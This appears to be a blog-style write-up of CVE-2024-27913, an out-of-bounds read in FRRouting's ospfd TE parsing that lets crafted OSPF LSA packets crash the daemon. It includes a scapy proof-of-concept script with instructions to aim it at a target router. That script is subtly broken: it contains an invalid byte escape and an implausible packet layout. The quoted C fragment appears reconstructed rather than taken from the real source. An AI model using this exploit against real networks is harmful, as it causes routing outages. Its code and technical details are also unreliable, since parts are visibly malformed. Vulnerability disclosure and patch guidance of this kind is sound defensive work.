FRRouting (FRR) is one of the most widely used open-source routing suites, powering large portions of the internet and enterprise networks. In February 2024, researchers discovered a critical bug—CVE-2024-27913—allowing remote attackers to crash the ospfd daemon via crafted OSPF packets. This flaw exists in the ospf_te_parse_te function of ospfd/ospf_te.c and affects FRR versions through 9.1.
This exclusive deep dive will explain the vulnerability, show you the root cause with code snippets, outline an example exploit, and share references so you can learn more or protect your networks.
What is OSPF and Why Focus on LSA Packets?
OSPF (Open Shortest Path First) is a common routing protocol. Routers use LSA (Link State Advertisement) packets to exchange information about their local network. The OSPF daemon (ospfd) running within FRR is responsible for parsing these packets.
A bug in parsing LSA packets means an attacker can remotely crash routers—taking large networks offline!
Vuln ID: CVE-2024-27913
- Affected Component: ospfd/ospf_te.c (OSPF TE handling in FRRouting)
Under the Hood: The Code
Within ospf_te_parse_te, the code parses attribute fields from incoming OSPF LSA packets. The bug is a missing length check—a classic C programming pitfall:
// Bad code fragment
lfield = (struct te_lsa_link*) pnt;
pnt += sizeof(struct te_lsa_link);
// No check: Is the attribute field even present in the packet?
attr = (struct te_lsa_link_attr*) pnt;
// Code assumes attr exists, accesses attr->type (BOOM if not enough data)
switch(attr->type) {
// Processing for each attribute type...
}
If a packet is crafted so the attribute field is missing or incomplete, accessing attr->type causes an out-of-bounds read, often leading to a segmentation fault and immediate ospfd crash.
Proof-of-Concept (PoC) Exploit
Below you’ll find a minimal Python exploit using scapy to forge a malicious OSPF LSA packet that triggers the bug.
WARNING: Only use in an isolated lab against test routers!
# Requires: pip install scapy
from scapy.all import *
# Build a minimal OSPF Hello/LSA
ospf_packet = b'\x02' # OSPF Version: 2
ospf_packet += b'\x04' # Type: LSA Update
ospf_packet += b'\x00\x24' # Packet Length (arbitrary)
ospf_packet += b'\x00\x00\x00\x00' # Router ID
ospf_packet += b'\x00\x00\x00\x00' # Area ID
ospf_packet += b'\x00\x00\x00\x00' # Checksum, Auth, etc.
# OSPF LSA header (LSA type 10 = Opaque LSA)
ospf_packet += b'\x00\xa' # LSA type (10, Opaque LSA)
ospf_packet += b'\x00\x00\x00\x00' # Opaque ID
# Incomplete attribute field (te_lsa_link_attr missing)
# This will cause the crash
send(IP(dst="ROUTER_IP", proto=89)/Raw(load=ospf_packet))
To use:
Replace ROUTER_IP with the OSPF-facing address of your target router.
2. Run the script on a machine in the same broadcast/multicast domain.
Result:
The router’s ospfd process will crash—no root privileges, no authentication required.
Impact
- Remotely crash routers: Any OSPF speaker on the network can crash FRR routers, causing network outages.
- Denial of Service: Bringing down OSPF means routes are withdrawn, possibly cutting off entire portions of the network.
- Potential for further memory corruption: While this bug is only DoS, similar unchecked reads can sometimes become RCE (Remote Code Execution).
How to Defend
FRR fixed the bug in this commit (March 2024).
References
- FRRouting GitHub Security Advisory: GHSA-9xw3-6f54-v775
- NVD CVE-2024-27913 Detail
- FRR Patch Commit: 4c8ed916 (GitHub)
- Original OSPF LSA Format: RFC 2328
Conclusion
CVE-2024-27913 is another reminder that network protocol parsers are complex, and a single missing check can have global-scale consequences. If you run open-source routers, keep them patched—and don’t trust everything on your layer 2 domain. Stay safe!
Timeline
Published on: 02/28/2024 07:15:09 UTC
Last modified on: 01/21/2025 14:55:08 UTC